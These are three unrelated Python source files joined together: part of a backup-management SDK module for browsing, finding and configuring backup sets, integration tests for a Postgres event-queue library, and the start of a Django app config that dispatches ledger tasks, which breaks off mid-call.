db_user_password = b64encode(db_options.get('db_user_password').encode()).decode()
request_json = {
"backupSetInfo": {
"backupSetEntity": {
"clientName": self._client_object.client_name,
"instanceName": self._instance_object.instance_name,
"backupsetName": salesforce_options.get('salesforce_user_name'),
"appName": self._agent_object.agent_name
},
"cloudAppsBackupset": {
"instanceType": 3,
"salesforceBackupSet": {
"enableREST": True,
"downloadCachePath": kwargs.get('download_cache_path', '/tmp'),
"mutualAuthPath": kwargs.get('mutual_auth_path', ''),
"token": salesforce_token,
"userPassword": {
"userName": salesforce_options.get('salesforce_user_name'),
"password": salesforce_password,
},
"syncDatabase": {
"dbEnabled": db_options.get('db_enabled', False),
"dbPort": db_options.get('db_port', '1433'),
"dbInstance": db_options.get('db_instance', ''),
"dbName": db_options.get('db_name', self._instance_object.instance_name),
"dbType": db_options.get('db_type', "SQLSERVER"),
"dbHost": db_options.get('db_host_name', ''),
"dbUserPassword": {
"userName": db_options.get('db_user_name', ''),
"password": db_user_password,
},
},
},
"generalCloudProperties": {
"numberOfBackupStreams": kwargs.get('streams', 2),
"storageDevice": {
"dataBackupStoragePolicy": {
"storagePolicyName": kwargs.get('storage_policy', '')
},
},
},
},
},
}
self._process_add_response(salesforce_options.get('salesforce_user_name'), request_json)
def get(self, backupset_name):
"""Returns a backupset object of the specified backupset name.
Args:
backupset_name (str) -- name of the backupset
Returns:
object - instance of the Backupset class for the given backupset name
Raises:
SDKException:
if type of the backupset name argument is not string
if no backupset exists with the given name
"""
if not isinstance(backupset_name, basestring):
raise SDKException('Backupset', '101')
else:
backupset_name = backupset_name.lower()
if self.has_backupset(backupset_name):
if self._instance_object is None:
self._instance_object = self._agent_object.instances.get(
self._backupsets[backupset_name]['instance']
)
if self._agent_object.agent_name in self._backupsets_dict.keys():
return self._backupsets_dict[self._agent_object.agent_name](
self._instance_object,
backupset_name,
self._backupsets[backupset_name]["id"]
)
else:
return Backupset(
self._instance_object,
backupset_name,
self._backupsets[backupset_name]["id"]
)
raise SDKException(
'Backupset', '102', 'No backupset exists with name: "{0}"'.format(backupset_name)
)
def delete(self, backupset_name):
"""Deletes the backup set from the agent.
Args:
backupset_name (str) -- name of the backupset
Raises:
SDKException:
if type of the backupset name argument is not string
if failed to delete the backupset
if response is empty
if response is not success
if no backupset exists with the given name
"""
if not isinstance(backupset_name, basestring):
raise SDKException('Backupset', '101')
else:
backupset_name = backupset_name.lower()
if self.has_backupset(backupset_name):
delete_backupset_service = self._services['BACKUPSET'] % (
self._backupsets[backupset_name]['id']
)
flag, response = self._cvpysdk_object.make_request('DELETE', delete_backupset_service)
if flag:
if response.json():
if 'response' in response.json():
response_value = response.json()['response'][0]
error_code = str(response_value['errorCode'])
error_message = None
if 'errorString' in response_value:
error_message = response_value['errorString']
if error_message:
o_str = 'Failed to delete backupset\nError: "{0}"'
raise SDKException('Backupset', '102', o_str.format(error_message))
else:
if error_code == '0':
# initialize the backupsets again
# so the backupsets object has all the backupsets
self.refresh()
else:
o_str = ('Failed to delete backupset with error code: "{0}"\n'
'Please check the documentation for '
'more details on the error').format(error_code)
raise SDKException('Backupset', '102', o_str)
else:
error_code = response.json()['errorCode']
error_message = response.json()['errorMessage']
o_str = 'Failed to delete backupset\nError: "{0}"'.format(error_message)
raise SDKException('Backupset', '102', o_str)
else:
raise SDKException('Response', '102')
else:
raise SDKException('Response', '101', self._update_response_(response.text))
else:
raise SDKException(
'Backupset', '102', 'No backupset exists with name: "{0}"'.format(backupset_name)
)
def refresh(self):
"""Refresh the backupsets associated with the Agent / Instance."""
self._backupsets = self._get_backupsets()
@property
def default_backup_set(self):
"""Returns the name of the default backup set for the selected Client and Agent."""
return self._default_backup_set
class Backupset(object):
"""Class for performing backupset operations for a specific backupset."""
def __init__(self, instance_object, backupset_name, backupset_id=None):
"""Initialise the backupset object.
Args:
instance_object (object) -- instance of the Instance class
backupset_name (str) -- name of the backupset
backupset_id (str) -- id of the backupset
default: None
Returns:
object - instance of the Backupset class
"""
self._instance_object = instance_object
self._agent_object = self._instance_object._agent_object
self._client_object = self._agent_object._client_object
self._commcell_object = self._agent_object._commcell_object
self._cvpysdk_object = self._commcell_object._cvpysdk_object
self._services = self._commcell_object._services
self._update_response_ = self._commcell_object._update_response_
# self._restore_methods = ['_process_restore_response', '_filter_paths', '_restore_json']
self._restore_methods = [
'_process_restore_response',
'_filter_paths',
'_restore_json',
'_impersonation_json',
'_restore_browse_option_json',
'_restore_common_options_json',
'_restore_destination_json',
'_restore_fileoption_json',
'_json_restore_subtask'
]
self._restore_options_json = [
'_impersonation_json_',
'_browse_restore_json',
'_destination_restore_json',
'_commonoption_restore_json',
'_fileoption_restore_json',
]
self._backupset_name = backupset_name.split('\\')[-1].lower()
self._description = None
if backupset_id:
# Use the backupset id provided in the arguments
self._backupset_id = str(backupset_id)
else:
# Get the id associated with this backupset
self._backupset_id = self._get_backupset_id()
self._BACKUPSET = self._services['BACKUPSET'] % (self.backupset_id)
self._BROWSE = self._services['BROWSE']
self._RESTORE = self._services['RESTORE']
self._is_default = False
self._is_on_demand_backupset = False
self._properties = None
self._backupset_association = {}
self._plan = None
self.subclients = None
self.schedules = None
self.refresh()
self._default_browse_options = {
'operation': 'browse',
'show_deleted': False,
'from_time': 0, # value should either be the Epoch time or the Timestamp
'to_time': 0, # value should either be the Epoch time or the Timestamp
'path': '\\',
'copy_precedence': 0,
'media_agent': '',
'page_size': 100000,
'skip_node': 0,
'restore_index': True,
'vm_disk_browse': False,
'filters': [],
'job_id': 0,
'commcell_id': self._commcell_object.commcell_id,
'include_aged_data': False,
'include_hidden': False,
'include_running_jobs': False,
'vs_volume_browse': False,
'browse_view_name': 'VOLUMEVIEW',
'_subclient_id': 0,
'_raw_response': False
}
def __getattr__(self, attribute):
"""Returns the persistent attributes"""
if attribute in self._restore_methods:
return getattr(self._instance_object, attribute)
elif attribute in self._restore_options_json:
return getattr(self._instance_object, attribute)
return super(Backupset, self).__getattribute__(attribute)
def __repr__(self):
"""String representation of the instance of this class."""
representation_string = ('Backupset class instance for Backupset: "{0}" '
'for Instance: "{1}" of Agent: "{2}"')
return representation_string.format(
self.backupset_name,
self._instance_object.instance_name,
self._agent_object.agent_name
)
def _get_backupset_id(self):
"""Gets the backupset id associated with this backupset.
Returns:
str - id associated with this backupset
"""
backupsets = Backupsets(self._instance_object)
return backupsets.get(self.backupset_name).backupset_id
def _get_backupset_properties(self):
"""Gets the properties of this backupset.
Raises:
SDKException:
if response is empty
if response is not success
"""
flag, response = self._cvpysdk_object.make_request('GET', self._BACKUPSET)
if flag:
if response.json() and "backupsetProperties" in response.json():
self._properties = response.json()["backupsetProperties"][0]
backupset_name = self._properties["backupSetEntity"]["backupsetName"]
self._backupset_name = backupset_name.lower()
self._backupset_association = self._properties['backupSetEntity']
self._is_default = bool(self._properties["commonBackupSet"]["isDefaultBackupSet"])
if 'commonBackupSet' in self._properties:
if 'onDemandBackupset' in self._properties['commonBackupSet']:
self._is_on_demand_backupset = bool(
self._properties['commonBackupSet']['onDemandBackupset']
)
if "userDescription" in self._properties["commonBackupSet"]:
self._description = self._properties["commonBackupSet"]["userDescription"]
if "planName" in self._properties["planEntity"]:
self._plan = self._commcell_object.plans.get(
self._properties["planEntity"]["planName"]
)
else:
self._plan = None
else:
raise SDKException('Response', '102')
else:
raise SDKException('Response', '101', self._update_response_(response.text))
def _run_backup(self, subclient_name, return_list):
"""Triggers incremental backup job for the given subclient,
and appends its Job object to the list.
The SDKExcpetion class instance is appended to the list,
if any exception is raised while running the backup job for the Subclient.
Args:
subclient_name (str) -- name of the subclient to trigger the backup for
return_list (list) -- list to append the job object to
"""
try:
job = self.subclients.get(subclient_name).backup()
if job:
return_list.append(job)
except SDKException as excp:
return_list.append(excp)
def _process_update_reponse(self, request_json):
"""Runs the Backupset update API with the request JSON provided,
and returns the contents after parsing the response.
Args:
request_json (dict) -- JSON request to run for the API
Returns:
(bool, basestring, basestring):
bool - flag specifies whether success / failure
str - error code received in the response
str - error message received
Raises:
SDKException:
if response is empty
if response is not success
"""
flag, response = self._cvpysdk_object.make_request('POST', self._BACKUPSET, request_json)
self._get_backupset_properties()
if flag:
if response.json() and "response" in response.json():
error_code = str(response.json()["response"][0]["errorCode"])
if error_code == "0":
return True, "0", ""
else:
error_string = ""
if "errorString" in response.json()["response"][0]:
error_string = response.json()["response"][0]["errorString"]
if error_string:
return False, error_code, error_string
else:
return False, error_code, ""
else:
raise SDKException('Response', '102')
else:
raise SDKException('Response', '101', self._update_response_(response.text))
def _update(self, backupset_name, backupset_description, default_backupset):
"""Updates the properties of the backupset.
Args:
backupset_name (str) -- new name of the backupset
backupset_description (str) -- description of the backupset
default_backupset (bool) -- default backupset property
Returns:
(bool, basestring, basestring):
bool - flag specifies whether success / failure
str - error code received in the response
str - error message received
Raises:
SDKException:
if response is empty
if response is not success
"""
request_json = {
"association": {
"entity": [{
"clientName": self._client_object.client_name,
"appName": self._agent_object.agent_name,
"instanceName": self._instance_object.instance_name,
"backupsetName": self.backupset_name
}]
},
"backupsetProperties": {
"commonBackupSet": {
"newBackupSetName": backupset_name,
"isDefaultBackupSet": default_backupset
}
}
}
if backupset_description is not None:
request_json["backupsetProperties"]["commonBackupSet"][
"userDescription"] = backupset_description
return self._process_update_reponse(request_json)
@staticmethod
def _get_epoch_time(timestamp):
"""Returns the Epoch time given the input time is in format %Y-%m-%d %H:%M:%S.
Args:
timestamp (int / str) -- value should either be the Epoch time or, the
Timestamp of the format %Y-%m-%d %H:%M:%S
Returns:
int - epoch time converted from the input timestamp
Raises:
SDKException:
if the input timestamp is not of correct format
"""
if str(timestamp) == '0':
return 0
try:
# return the timestamp value in int type
return int(timestamp)
except ValueError:
# if not convertible to int, then convert the timestamp input to Epoch time
try:
return int(time.mktime(time.strptime(timestamp, "%Y-%m-%d %H:%M:%S")))
except Exception:
raise SDKException('Subclient', '106')
def _set_defaults(self, final_dict, defaults_dict):
"""Iterates over the defaults_dict, and adds the default value to the final_dict,
for the key which is not present in the final dict.
Recursively sets default values on the final_dict dictionary.
Args:
final_dict (dict) -- the dictionary to be set with defaults, and to be used
to generate the Browse / Find JSON
defaults_dict (dict) -- the dictionary with default values
Returns:
None
"""
for key in defaults_dict:
if key not in final_dict:
final_dict[key] = defaults_dict[key]
if isinstance(defaults_dict[key], dict):
self._set_defaults(final_dict[key], defaults_dict[key])
def _prepare_browse_options(self, options):
"""Prepares the options for the Browse/find operation.
Args:
options (dict) -- a dictionary of browse options
Returns:
dict - The browse options with all the default options set
"""
self._set_defaults(options, self._default_browse_options)
return options
def _prepare_browse_json(self, options):
"""Prepares the JSON object for the browse request.
Args:
options (dict) -- the browse options dictionary
Returns:
dict - A JSON object for the browse response
"""
operation_types = {
'browse': 0,
'find': 1,
'all_versions': 2,
'delete_data': 7
}
options['operation'] = options['operation'].lower()
if options['operation'] not in operation_types:
options['operation'] = 'find'
# add the browse mode value here, if it is different for an agent
# if agent is not added in the dict, default value 2 will be used
browse_mode = {
'virtual server': 4,
'cloud apps': 3,
'azure ad' : 3
}
mode = 2
paths = []
if isinstance(options['path'], basestring):
paths.append(options['path'])
elif isinstance(options['path'], list):
paths = options['path']
else:
paths = ['\\']
if self._agent_object.agent_name in browse_mode:
mode = browse_mode[self._agent_object.agent_name]
request_json = {
"opType": operation_types[options['operation']],
"mode": {
"mode": mode
},
"paths": [{"path": path} for path in paths],
"options": {
"showDeletedFiles": options['show_deleted'],
"restoreIndex": options['restore_index'],
"vsDiskBrowse": options['vm_disk_browse'],
"vsFileBrowse": options.get('vs_file_browse', False)
},
"entity": {
"clientName": self._client_object.client_name,
"clientId": int(self._client_object.client_id),
"applicationId": int(self._agent_object.agent_id),
"instanceId": int(self._instance_object.instance_id),
"backupsetId": int(self.backupset_id),
"subclientId": int(options['_subclient_id'])
},
"timeRange": {
"fromTime": self._get_epoch_time(options['from_time']),
"toTime": self._get_epoch_time(options['to_time'])
},
"advOptions": {
"copyPrecedence": options['copy_precedence']
},
"ma": {
"clientName": options['media_agent']
},
"queries": [{
"type": 0,
"queryId": "dataQuery",
"dataParam": {
"sortParam": {
"ascending": False,
"sortBy": [0]
},
"paging": {
"pageSize": int(options['page_size']),
"skipNode": int(options['skip_node']),
"firstNode": 0
}
}
}]
}
if options['filters']:
# [('FileName', '*.txt'), ('FileSize','GT','100')]
request_json['queries'][0]['whereClause'] = []
for browse_filter in options['filters']:
if browse_filter[0] in ('FileName', 'FileSize'):
temp_dict = {
'connector': 0,
'criteria': {
'field': browse_filter[0],
'values': [browse_filter[1]]
}
}
if browse_filter[0] == 'FileSize':
temp_dict['criteria']['dataOperator'] = browse_filter[2]
request_json['queries'][0]['whereClause'].append(temp_dict)
if options['job_id'] is not 0:
request_json['advOptions']['advConfig'] = {
'browseAdvancedConfigBrowseByJob': {
'commcellId': options['commcell_id'],
'jobId': options['job_id']
}
}
if options['include_aged_data']:
request_json['options']['includeAgedData'] = True
if options['include_hidden']:
request_json['options']['includeHidden'] = True
if options['include_running_jobs']:
request_json['options']['includeRunningJobs'] = True
if options['vs_volume_browse']:
request_json['mode']['mode'] = 3
request_json['options']['vsVolumeBrowse'] = True
request_json['advOptions']['browseViewName'] = options['browse_view_name']
return request_json
def _process_browse_all_versions_response(self, result_set):
"""Retrieves the items from browse response.
Args:
result_set (list of dict) -- browse response dict obtained from server
Returns:
dict - Dictionary of the specified file with list of all the file versions and
additional metadata retrieved from browse
Raises:
SDKException:
if failed to browse/search for content
if response is empty
if response is not success
"""
path = None
versions_list = []
for result in result_set:
name = result['displayName']
path = result['path']
if 'modificationTime' in result:
mod_time = time.localtime(int(result['modificationTime']))
mod_time = time.strftime('%d/%m/%Y %H:%M:%S', mod_time)
else:
mod_time = None
if 'file' in result['flags']:
if result['flags']['file'] in (True, '1'):
file_or_folder = 'File'
else:
file_or_folder = 'Folder'
else:
file_or_folder = 'Folder'
if 'size' in result:
size = result['size']
else:
size = None
if 'version' in result:
version = result['version']
else:
version = None
paths_dict = {
'name': name,
'version': version,
'size': size,
'modified_time': mod_time,
'type': file_or_folder,
'advanced_data': result['advancedData']
}
versions_list.append(paths_dict)
all_versions_dict = dict()
all_versions_dict[path] = versions_list
return all_versions_dict
def _process_browse_response(self, flag, response, options):
"""Retrieves the items from browse response.
Args:
flag (bool) -- boolean, whether the response was success or not
response (dict) -- JSON response received for the request from the Server
options (dict) -- The browse options dictionary
Returns:
list - List of only the file / folder paths from the browse response
dict - Dictionary of all the paths with additional metadata retrieved from browse
Raises:
SDKException:
if failed to browse/search for content
if response is empty
if response is not success
"""
operation_types = {
"browse": ('110', 'Failed to browse for subclient backup content\nError: "{0}"'),
"find": ('111', 'Failed to Search\nError: "{0}"'),
"all_versions": (
'112', 'Failed to browse all version for specified content\nError: "{0}"'
),
"delete_data": (
'113', 'Failed to perform delete data operation for given content\nError: "{0}"'
)
}
exception_code = operation_types[options['operation']][0]
exception_message = operation_types[options['operation']][1]
if flag:
response_json = response.json()
paths_dict = {}
paths = []
result_set = None
browse_result = None
# Send raw result as browse response for advanced use cases
if options['_raw_response']:
return [], response_json
if response_json and 'browseResponses' in response_json:
_browse_responses = response_json['browseResponses']
for browse_response in _browse_responses:
if "browseResult" in browse_response:
browse_result = browse_response['browseResult']
if 'dataResultSet' in browse_result:
result_set = browse_result['dataResultSet']
break
if not browse_result:
try:
message = response_json['browseResponses'][0]['messages'][0]
error_message = message['errorMessage']
o_str = exception_message
raise SDKException('Subclient', '102', o_str.format(error_message))
except KeyError:
return [], {}
if not result_set:
raise SDKException('Subclient', exception_code)
if not isinstance(result_set, list):
result_set = [result_set]
if 'all_versions' in options['operation']:
return self._process_browse_all_versions_response(result_set)
for result in result_set:
name = result.get('displayName')
snap_display_name = result.get('name')
if 'path' in result:
path = result['path']
else:
path = '\\'.join([options['path'], name])
if 'modificationTime' in result and int(result['modificationTime']) > 0:
mod_time = time.localtime(int(result['modificationTime']))
mod_time = time.strftime('%d/%m/%Y %H:%M:%S', mod_time)
else:
mod_time = None
if 'file' in result['flags']:
if result['flags']['file'] in (True, '1'):
file_or_folder = 'File'
else:
file_or_folder = 'Folder'
else:
file_or_folder = 'Folder'
if 'size' in result:
size = result['size']
else:
size = None
paths_dict[path] = {
'name': name,
'snap_display_name': snap_display_name,
'size': size,
'modified_time': mod_time,
'type': file_or_folder,
'advanced_data': result['advancedData']
}
paths.append(path)
return paths, paths_dict
else:
raise SDKException('Response', '102')
else:
raise SDKException('Response', '101', self._update_response_(response.text))
def _do_browse(self, options=None):
"""Performs a browse operation with the given options.
Args:
options (dict) -- dictionary of browse options
Returns:
list - List of only the file, folder paths from the browse response
dict - Dictionary of all the paths with additional metadata retrieved from browse
"""
if options is None:
options = {}
options = self._prepare_browse_options(options)
request_json = self._prepare_browse_json(options)
flag, response = self._cvpysdk_object.make_request('POST', self._BROWSE, request_json)
return self._process_browse_response(flag, response, options)
def update_properties(self, properties_dict):
"""Updates the backupset properties
Args:
properties_dict (dict) -- Backupset property dict which is to be updated
Returns:
None
Raises:
SDKException:
if failed to add
if response is empty
if response code is not as expected
**Note** self.properties can be used to get a deep copy of all the properties, modify the properties which you
need to change and use the update_properties method to set the properties
"""
request_json = {
"backupsetProperties": {},
"association": {
"entity": [
{
"clientName": self._client_object.client_name,
"backupsetName": self.backupset_name,
"instanceName": self._instance_object.instance_name,
"appName": self._agent_object.agent_name
}
]
}
}
request_json['backupsetProperties'].update(properties_dict)
status, _, error_string = self._process_update_reponse(request_json)
if not status:
raise SDKException(
'Backupset',
'102',
'Failed to update backupset property\nError: "{0}"'.format(error_string))
@property
def properties(self):
"""Returns the backupset properties"""
return copy.deepcopy(self._properties)
@property
def name(self):
"""Returns the Backupset display name"""
return self._properties["backupSetEntity"]["backupsetName"]
@property
def backupset_id(self):
"""Treats the backupset id as a read-only attribute."""
return self._backupset_id
@property
def backupset_name(self):
"""Treats the backupset name as a property of the Backupset class."""
return self._backupset_name
@property
def description(self):
"""Treats the backupset description as a property of the Backupset class."""
return self._description
@property
def is_default_backupset(self):
"""Treats the is default backupset as a read-only attribute."""
return self._is_default
@property
def is_on_demand_backupset(self):
"""Treats the is on demand backupset as a read-only attribute."""
return self._is_on_demand_backupset
@property
def plan(self):
"""Treats the backupset plan as a property of the Backupset class."""
return self._plan
@property
def guid(self):
"""Treats the backupset GUID as a property of the Backupset class."""
if self._properties.get('backupSetEntity'):
if self._properties['backupSetEntity'].get('backupsetGUID'):
return self._properties['backupSetEntity']['backupsetGUID']
raise SDKException('Backupset', '102', 'Backupset GUID not found')
raise SDKException('Backupset', '102', 'Backupset entity not found')
@backupset_name.setter
def backupset_name(self, value):
"""Sets the name of the backupset as the value provided as input.
Raises:
SDKException:
if failed to update the backupset name
if type of value input is not string
"""
if isinstance(value, basestring):
output = self._update(
backupset_name=value,
backupset_description=self.description,
default_backupset=self.is_default_backupset
)
if output[0]:
return
o_str = 'Failed to update the name of the backupset\nError: "{0}"'
raise SDKException('Backupset', '102', o_str.format(output[2]))
raise SDKException('Backupset', '102', 'Backupset name should be a string value')
@description.setter
def description(self, value):
"""Sets the description of the backupset as the value provided as input.
Raises:
SDKException:
if failed to update the backupset description
if type of value input is not string
if description cannot be modified for this backupset
"""
if self.description is not None:
if isinstance(value, basestring):
output = self._update(
backupset_name=self.backupset_name,
backupset_description=value,
default_backupset=self.is_default_backupset
)
if output[0]:
return
o_str = 'Failed to update the description of the backupset\nError: "{0}"'
raise SDKException('Backupset', '102', o_str.format(output[2]))
raise SDKException(
'Backupset', '102', 'Backupset description should be a string value'
)
raise SDKException('Backupset', '102', 'Description cannot be modified')
@plan.setter
def plan(self, value):
"""Associates the plan to the backupset
Args:
value (object) -- the Plan object which is to be associated
with the backupset
value (str) -- name of the plan which is to be associated
with the backupset
value (None) -- set value to None to remove plan associations
Raises:
SDKException:
if plan does not exist
if plan association fails
if plan is not eligible to be associated
"""
from .plan import Plan
if isinstance(value, Plan):
plan_obj = value
elif isinstance(value, basestring):
plan_obj = self._commcell_object.plans.get(value)
elif value is None:
plan_obj = {
'planName': None
}
else:
raise SDKException('Backupset', '102', 'Input value is not of supported type')
plans_obj = self._commcell_object.plans
entity_dict = {
'clientId': int(self._client_object.client_id),
'appId': int(self._agent_object.agent_id),
'backupsetId': int(self.backupset_id)
}
if value is not None and plan_obj.plan_name in plans_obj.get_eligible_plans(entity_dict):
request_json = {
'backupsetProperties': {
'planEntity': {
'planSubtype': int(plan_obj.subtype),
'_type_': 158,
'planType': int(plan_obj.plan_type),
'planName': plan_obj.plan_name,
'planId': int(plan_obj.plan_id)
}
}
}
response = self._process_update_reponse(
request_json
)
if response[0]:
return
else:
o_str = 'Failed to asspciate plan to the backupset\nError: "{0}"'
raise SDKException('Backupset', '102', o_str.format(response[2]))
elif value is None:
request_json = {
'backupsetProperties': {
'removePlanAssociation': True
}
}
response = self._process_update_reponse(
request_json
)
if response[0]:
return
else:
o_str = 'Failed to dissociate plan from backupset\nError: "{0}"'
raise SDKException('Backupset', '102', o_str.format(response[2]))
else:
raise SDKException(
'Backupset',
'102',
'Plan not eligible to be associated with the backupset'
)
def set_default_backupset(self):
"""Sets the backupset represented by this Backupset class instance as the default backupset
if it is not the default backupset.
Raises:
SDKException:
if failed to set this as the default backupset
"""
if self.is_default_backupset is False:
output = self._update(
backupset_name=self.backupset_name,
backupset_description=self.description,
default_backupset=True
)
if output[0]:
return
o_str = 'Failed to set this as the Default Backup Set\nError: "{0}"'
raise SDKException('Backupset', '102', o_str.format(output[2]))
def backup(self):
"""Runs Incremental backup job for all subclients in this backupset.
Runs Full Backup job for a subclient, if no job had been ran earlier for it.
Returns:
list - list consisting of the job objects for the backup jobs started for
the subclients in the backupset
"""
return_list = []
thread_list = []
if self.subclients.all_subclients:
for subclient in self.subclients.all_subclients:
thread = threading.Thread(
target=self._run_backup, args=(subclient, return_list)
)
thread_list.append(thread)
thread.start()
for thread in thread_list:
thread.join()
return return_list
def browse(self, *args, **kwargs):
"""Browses the content of the Backupset.
Args:
Dictionary of browse options:
Example:
browse({
'path': 'c:\\\\hello',
'show_deleted': True,
'from_time': '2014-04-20 12:00:00',
'to_time': '2016-04-21 12:00:00'
})
Kwargs:
Keyword argument of browse options:
Example:
browse(
path='c:\\hello',
show_deleted=True,
from_time='2014-04-20 12:00:00',
to_time='2016-04-21 12:00:00'
)
Returns:
(list, dict)
list - List of only the file, folder paths from the browse response
dict - Dictionary of all the paths with additional metadata retrieved
from browse operation
Refer `default_browse_options`_ for all the supported options.
.. _default_browse_options: https://github.com/CommvaultEngg/cvpysdk/blob/master/cvpysdk/backupset.py#L565
"""
if args and isinstance(args[0], dict):
options = args[0]
else:
options = kwargs
options['operation'] = 'browse'
return self._do_browse(options)
def find(self, *args, **kwargs):
"""Searches a file/folder in the backed up content of the backupset,
and returns all the files matching the filters given.
Args:
Dictionary of browse options:
Example:
find({
'file_name': '*.txt',
'show_deleted': True,
'from_time': '2014-04-20 12:00:00',
'to_time': '2016-04-31 12:00:00'
})
Kwargs:
Keyword argument of browse options:
Example:
find(
file_name='*.txt',
show_deleted=True,
'from_time': '2014-04-20 12:00:00',
to_time='2016-04-31 12:00:00'
)
Returns:
(list, dict)
list - List of only the file, folder paths from the browse response
dict - Dictionary of all the paths with additional metadata retrieved
from browse operation
Refer `default_browse_options`_ for all the supported options.
Additional options supported:
file_name (str) -- Find files with name
file_size_gt (int) -- Find files with size greater than size
file_size_lt (int) -- Find files with size lesser than size
file_size_et (int) -- Find files with size equal to size
.. _default_browse_options: https://github.com/CommvaultEngg/cvpysdk/blob/master/cvpysdk/backupset.py#L565
"""
if args and isinstance(args[0], dict):
options = args[0]
else:
options = kwargs
options['operation'] = 'find'
if 'path' not in options:
options['path'] = '\\**\\*'
if 'filters' not in options:
options['filters'] = []
if 'file_name' in options:
options['filters'].append(('FileName', options['file_name']))
if 'file_size_gt' in options:
options['filters'].append(('FileSize', options['file_size_gt'], 'GTE'))
if 'file_size_lt' in options:
options['filters'].append(('FileSize', options['file_size_lt'], 'LTE'))
if 'file_size_et' in options:
options['filters'].append(('FileSize', options['file_size_et'], 'EQUALSBLAH'))
return self._do_browse(options)
def delete_data(self, paths):
"""Deletes items for the backupset in the Index and makes them unavailable for
browsing and recovery
Args:
paths (str/list) -- The list of paths or single path to delete
from the backupset
Returns:
None -- If delete request is sent successfully
Raises:
Exception, if unable to prepare, response is invalid or send the
delete data request
"""
options = {
'operation': 'delete_data',
'path': paths
}
files, _ = self._do_browse(options)
# Delete operation does not return any result, hence consider the operation successful
if files:
raise SDKException('Backupset', '102', 'Delete data operation gave unexpected results')
def refresh(self):
"""Refresh the properties of the Backupset."""
self._get_backupset_properties()
self.subclients = Subclients(self)
self.schedules = Schedules(self)
|
test_data_access.py
|
import time
from datetime import timedelta
from threading import Thread
import pytest
from pgevents import data_access, constants
from pgevents.event import Event
from pgevents.utils import timestamps
from tests.integration import DSN
@pytest.fixture(autouse=True)
def clear_events():
connection = data_access.connect(DSN)
with data_access.cursor(connection) as cursor:
data_access.truncate_events(cursor)
def test_listen_notify_unlisten():
connection = data_access.connect(DSN)
channel = "foo"
with data_access.cursor(connection) as cursor:
data_access.listen(cursor, channel)
with data_access.cursor(connection) as cursor:
data_access.notify(cursor, channel)
connection.poll()
assert connection.notifies
while connection.notifies:
connection.notifies.pop()
with data_access.cursor(connection) as cursor:
data_access.unlisten(cursor, channel)
with data_access.cursor(connection) as cursor:
data_access.notify(cursor, channel)
connection.poll()
assert not connection.notifies
def test_create_and_get_event_without_payload():
connection = data_access.connect(DSN)
event = Event(topic="foo")
with data_access.cursor(connection) as cursor:
created = data_access.create_event(cursor, event)
with data_access.cursor(connection) as cursor:
retrieved = data_access.get_event_by_id(cursor, created.id)
assert created == retrieved
assert created.status == constants.PENDING
@pytest.mark.parametrize(
["payload"],
[[None], [True], ["Hello world"], [1], [[0, 1, 2]], [dict(hello=[0, 1])]],
)
def test_create_and_get_event_with_payload(payload):
connection = data_access.connect(DSN)
event = Event(topic="foo", payload=payload)
with data_access.cursor(connection) as cursor:
created = data_access.create_event(cursor, event)
with data_access.cursor(connection) as cursor:
retrieved = data_access.get_event_by_id(cursor, created.id)
assert retrieved.payload == payload
def test_create_and_get_event_with_process_after():
connection = data_access.connect(DSN)
event = Event(topic="foo", process_after=timestamps.now() + timedelta(seconds=10))
with data_access.cursor(connection) as cursor:
created = data_access.create_event(cursor, event)
with data_access.cursor(connection) as cursor:
retrieved = data_access.get_event_by_id(cursor, created.id)
assert retrieved.process_after == event.process_after
@pytest.mark.parametrize(
[
"first_process_after",
"second_process_after",
"expected_first_status",
"expected_second_status",
],
[
[None, None, constants.PROCESSED, constants.PROCESSED,],
[
timestamps.now() + timedelta(seconds=10),
None,
constants.PENDING,
constants.PROCESSED,
],
],
)
def test_get_next_event(
first_process_after,
second_process_after,
expected_first_status,
expected_second_status,
):
connection = data_access.connect(DSN)
topic = "foo"
with data_access.cursor(connection) as cursor:
first = data_access.create_event(
cursor, Event(topic=topic, process_after=first_process_after)
)
second = data_access.create_event(
cursor, Event(topic=topic, process_after=second_process_after)
)
time.sleep(0.1)
def slow_running():
local_connection = data_access.connect(DSN)
with data_access.cursor(local_connection) as cursor:
event = data_access.get_next_event(cursor, [topic])
time.sleep(0.5)
if event:
data_access.mark_event_processed(cursor, event.id)
def fast_running():
local_connection = data_access.connect(DSN)
with data_access.cursor(local_connection) as cursor:
event = data_access.get_next_event(cursor, [topic])
if event:
data_access.mark_event_processed(cursor, event.id)
slow_thread = Thread(target=slow_running)
slow_thread.start()
time.sleep(0.1)
fast_thread = Thread(target=fast_running)
fast_thread.start()
slow_thread.join()
fast_thread.join()
with data_access.cursor(connection) as cursor:
retrieved_first = data_access.get_event_by_id(cursor, first.id)
assert retrieved_first.status == expected_first_status
with data_access.cursor(connection) as cursor:
retrieved_second = data_access.get_event_by_id(cursor, second.id)
assert retrieved_second.status == expected_second_status
def test_mark_event_processed():
connection = data_access.connect(DSN)
event = Event(topic="foo")
with data_access.cursor(connection) as cursor:
created = data_access.create_event(cursor, event)
assert created.status == constants.PENDING
assert created.processed_at == None
with data_access.cursor(connection) as cursor:
data_access.mark_event_processed(cursor, created.id)
with data_access.cursor(connection) as cursor:
retrieved = data_access.get_event_by_id(cursor, created.id)
assert retrieved.status == constants.PROCESSED
assert retrieved.processed_at is not None
|
apps.py
|
import asyncio
import json
import logging
import multiprocessing
import time
import contextlib
from django.apps import AppConfig
from django.conf import settings
import glob
from hfc.fabric import Client
from hfc.fabric.peer import Peer
from hfc.fabric.user import create_user
from hfc.util.keyvaluestore import FileKeyValueStore
from substrapp.tasks.tasks import prepare_tuple, on_compute_plan
from substrapp.utils import get_owner
from substrapp.ledger.connection import get_hfc, ledger_grpc_options
from celery.result import AsyncResult
logger = logging.getLogger(__name__)
@contextlib.contextmanager
def get_event_loop():
loop = asyncio.new_event_loop()
asyncio.set_event_loop(loop)
try:
yield loop
finally:
loop.close()
def tuple_get_worker(event_type, asset):
if event_type == 'aggregatetuple':
return asset['worker']
return asset['dataset']['worker']
def on_tuples_event(channel_name, block_number, tx_id, tx_status, event_type, asset):
owner = get_owner()
worker_queue = f"{settings.ORG_NAME}.worker"
key = asset['key']
status = asset['status']
if tx_status != 'VALID':
logger.error(
f'Failed transaction on task {key}: type={event_type}'
f' status={status} with tx status: {tx_status}')
return
logger.info(f'Processing task {key}: type={event_type} status={status}')
if status != 'todo':
return
if event_type is None:
return
tuple_owner = tuple_get_worker(event_type, asset)
if tuple_owner != owner:
logger.info(f'Skipping task {key}: owner does not match'
f' ({tuple_owner} vs {owner})')
return
if AsyncResult(key).state != 'PENDING':
logger.info(f'Skipping task {key}: already exists')
return
prepare_tuple.apply_async(
